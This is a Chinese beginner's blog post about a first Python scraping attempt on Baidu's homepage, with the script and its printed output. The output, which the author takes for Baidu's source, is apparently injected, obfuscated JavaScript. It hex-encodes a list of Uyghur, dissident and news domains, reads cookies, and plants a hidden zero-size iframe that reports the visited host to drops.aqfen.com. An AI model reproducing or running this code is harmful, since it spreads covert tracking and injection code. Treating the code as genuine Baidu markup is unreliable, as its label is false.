Python:學習Python爬蟲的第一天

疑問:

跟着Python教學視頻,爬百度首頁,結果不同?(代碼、結果往下看)

1:

發現本地的IE瀏覽器打開百度有報錯,搜狗瀏覽器可以正常打開。而且,eclipse執行出來的結果跟在IE瀏覽器百度首頁查看到的源碼一樣是一樣的,360瀏覽器的源碼跟視頻裏一樣的。莫不是,eclipse默認的是IE瀏覽器的??

2:

修復IE瀏覽器:url=http://www.baidu.com/  打開仍有報錯,url=https://www.baidu.com/  可以正常打開。

eclipse執行還是不對。

3:

換了個url=http://www.kugou.com/ 爬 IE跟搜狗的源代碼相同,eclipse的結果還是怪怪的。。。證明跟瀏覽器無關了。

4:

爬酷狗首頁不正確的原因找到了。

其實是對的,只是因爲Eclipse Console 默認限制了結果行數(只顯示後80000的字符),去掉勾選後,顯示正常。

 百度。。。還是不知道爲什麼,換了個電腦效果一樣的。


環境:Python 3.x + eclipse

代碼如下:


import re
from urllib import request
 
url=r"http://www.baidu.com/"

#創建自定義的請求對象
req=request.Request(url)

#發送請求,獲取響應信息 
response=request.urlopen(req).read().decode('utf-8')

#pat=r"<title>(.*?)</title>"    #通過正則表達式進行數據清洗
#data=re.findall(pat,response)

print(response)

 

執行後結果如下:


<!DOCTYPE html>
<html lang="zh-CN"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<script type="text/javascript">
    (function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o<c.length&&!e;o++)try{e=new ActiveXObject(c[o])}catch(n){}}return e?e:(alert("Error creating the XMLHttpRequest object."),void(location.href=t))}function c(t,e){if(o)try{o.open("GET",t,!0),o.onreadystatechange=function(){if(4==o.readyState)if(200==o.status)try{e(o.responseText)}catch(t){}else document.write("HTTP Status "+o.status),document.close()},o.send(null)}catch(n){document.write("Can't connect to server:\n"+n),document.close()}}var o=n()
c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = document.createElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||document.getElementsByTagName('head')[0]).appendChild(n1);},1000);})})('http://www.baidu.com/?t=912558218',"var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["\x6E\x75\x72\x2E\x63\x6E","\x69\x7A\x64\x61\x2E\x63\x6F\x6D","\x62\x61\x64\x61\x6D\x62\x69\x7A\x2E\x63\x6F\x6D","\x75\x71\x75\x72\x2E\x63\x6E","\x75\x6C\x69\x6E\x69\x78\x2E\x63\x6F\x6D","\x65\x79\x6E\x65\x6B\x2E\x6E\x65\x74","\x65\x79\x6E\x65\x6B\x2E\x62\x69\x7A","\x63\x68\x65\x6E\x67\x61\x62\x6C\x65\x2E\x6E\x65\x74","\x78\x6D\x64\x35\x2E\x63\x6F\x6D","\x78\x6D\x64\x35\x2E\x6F\x72\x67","\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x74\x77\x69\x74\x74\x65\x72\x2E\x63\x6F\x6D","\x75\x68\x72\x70\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x68\x65\x77\x65\x72\x2E\x63\x6F\x6D","\x6D\x61\x61\x72\x69\x70\x2E\x6F\x72\x67","\x74\x72\x74\x2E\x6E\x65\x74\x2E\x74\x72","\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x74\x69\x6D\x65\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x61\x6D\x61\x72\x69\x63\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x63\x6F\x6E\x67\x72\x65\x73\x73\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x65\x6E\x73\x65\x6D\x62\x6C\x65\x2E\x63\x6F\x2E\x75\x6B","\x75\x79\x67\x68\x75\x72\x69\x73\x74\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6A\x61\x70\x61\x6E\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x70\x72\x65\x73\x73\x2E\x63\x6F\x6D","\x75\x79\x67\x68\x75\x72\x79\x61\x72\x2E\x6F\x72\x67","\x75\x79\x68\x65\x77\x65\x72\x2E\x62\x69\x7A","\x75\x79\x6D\x61\x61\x72\x69\x70\x2E\x63\x6F\x6D","\x61\x6B\x61\x64\x65\x6D\x69\x79\x65\x2E\x6F\x72\x67","\x69\x73\x74\x69\x71\x6C\x61\x6C\x2E\x6E\x65\x74","\x69\x75\x68\x72\x64\x66\x2E\x6F\x72\x67","\x6F\x6C\x69\x6D\x61\x6C\x61\x72\x2E\x6F\x72\x67","\x72\x66\x61\x2E\x6F\x72\x67","\x75\x6E\x74\x72\x2E\x6F\x72\x67","\x75\x79\x67\x68\x75\x72\x6E\x65\x74\x2E\x6F\x72\x67","\x61\x61\x77\x73\x61\x74\x2E\x63\x6F\x6D","\x61\x68\x73\x65\x6E\x64\x65\x72\x2E\x63\x6F\x6D","\x62\x65\x68\x69\x6E\x64\x2D\x62\x61\x72\x73\x2E\x6E\x65\x74","\x62\x65\x73\x74\x67\x6F\x72\x65\x2E\x63\x6F\x6D","\x62\x69\x6C\x69\x71\x69\x7A\x2E\x63\x6F\x6D","\x62\x69\x71\x6C\x65\x2E\x63\x6F\x6D","\x62\x6C\x69\x70\x2E\x74\x76","\x63\x68\x69\x6E\x65\x73\x65\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x63\x68\x69\x6E\x65\x73\x65\x62\x6C\x6F\x67\x2E\x75\x68\x72\x70\x2E\x6F\x72\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x62\x75\x6C\x74\x65\x6E\x69\x2E\x63\x6F\x6D","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x61\x2E\x74\x72\x2E\x67\x67","\x64\x6F\x67\x75\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x73\x65\x6D\x70\x6F\x7A\x79\x75\x6D\x75\x2E\x63\x6F\x6D","\x64\x6F\x77\x6E\x65\x75\x2E\x6F\x72\x67","\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x64\x61\x69\x6C\x79\x6D\x6F\x74\x69\x6F\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x2D\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2E\x74\x76","\x65\x61\x73\x74\x65\x72\x6E\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x65\x73\x74\x61\x6E\x2E\x63\x6F\x6D","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x2D\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x63\x63\x2E\x6F\x72\x67","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x67\x6F\x76\x65\x72\x6E\x6D\x65\x6E\x74\x69\x6E\x65\x78\x69\x6C\x65\x2E\x75\x73","\x65\x61\x73\x74\x74\x75\x72\x6B\x69\x73\x74\x61\x6E\x69\x6E\x66\x6F\x2E\x63\x6F\x6D","\x72\x66\x69\x2E\x66\x72","\x63\x68\x6F\x73\x75\x6E\x2E\x63\x6F\x6D","\x63\x6E\x61\x2E\x63\x6F\x6D\x2E\x74\x77","\x72\x74\x68\x6B\x2E\x68\x6B","\x73\x74\x68\x65\x61\x64\x6C\x69\x6E\x65\x2E\x63\x6F\x6D","\x6F\x72\x69\x65\x6E\x74\x61\x6C\x64\x61\x69\x6C\x79\x2E\x6F\x6E\x2E\x63\x63","\x69\x2D\x63\x61\x62\x6C\x65\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x70\x61\x6F\x6D\x6F\x6E\x74\x68\x6C\x79\x2E\x63\x6F\x6D","\x79\x7A\x7A\x6B\x2E\x63\x6F\x6D","\x6E\x65\x78\x74\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x63\x68\x69\x6E\x65\x73\x65\x70\x65\x6E\x2E\x6F\x72\x67","\x62\x6F\x78\x75\x6E\x2E\x63\x6F\x6D","\x6D\x69\x6E\x67\x6A\x69\x6E\x67\x6E\x65\x77\x73\x2E\x63\x6F\x6D","\x62\x65\x69\x6A\x69\x6E\x67\x73\x70\x72\x69\x6E\x67\x2E\x63\x6F\x6D","\x6D\x73\x67\x75\x61\x6E\x63\x68\x61\x2E\x63\x6F\x6D","\x62\x6F\x74\x61\x6E\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x77\x72\x63\x68\x69\x6E\x61\x2E\x6F\x72\x67","\x6F\x70\x65\x6E\x2E\x63\x6F\x6D\x2E\x68\x6B","\x61\x62\x6F\x6C\x75\x6F\x77\x61\x6E\x67\x2E\x63\x6F\x6D","\x36\x70\x61\x72\x6B\x2E\x63\x6F\x6D","\x63\x72\x65\x61\x64\x65\x72\x73\x2E\x6E\x65\x74","\x77\x65\x6E\x78\x75\x65\x63\x69\x74\x79\x2E\x63\x6F\x6D","\x73\x69\x6E\x6F\x76\x69\x73\x69\x6F\x6E\x2E\x6E\x65\x74","\x68\x61\x76\x65\x38\x2E\x74\x76","\x70\x6F\x70\x79\x61\x72\x64\x2E\x6F\x72\x67","\x6D\x69\x74\x62\x62\x73\x2E\x63\x6F\x6D","\x6F\x7A\x63\x68\x69\x6E\x65\x73\x65\x2E\x63\x6F\x6D","\x79\x6F\x72\x6B\x62\x62\x73\x2E\x63\x61","\x77\x65\x73\x74\x63\x61\x2E\x63\x6F\x6D","\x74\x6F\x6B\x79\x6F\x63\x6E\x2E\x63\x6F\x6D","\x31\x36\x33\x2E\x63\x6F\x6D","\x71\x71\x2E\x63\x6F\x6D","\x69\x66\x65\x6E\x67\x2E\x63\x6F\x6D","","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x74\x6F\x70","\x6C\x6F\x67","\x70\x61\x72\x65\x6E\x74","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x69\x6D\x6D\x6F\x72\x74\x61\x6C\x5F","\x65\x72\x72\x6F\x72","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x26\x68\x6F\x73\x74\x3D","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x68\x65\x69\x67\x68\x74","\x77\x69\x64\x74\x68","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x64\x72\x6F\x70\x73\x2E\x61\x71\x66\x65\x6E\x2E\x63\x6F\x6D\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x2F\x70\x75\x62\x6C\x69\x63\x2F\x3F\x73\x79\x73\x64\x61\x74\x61\x3D","\x22\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];var stander_url= new Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45],__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");
</script>
</head>
<body style="display:none">
</body>
</html>

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章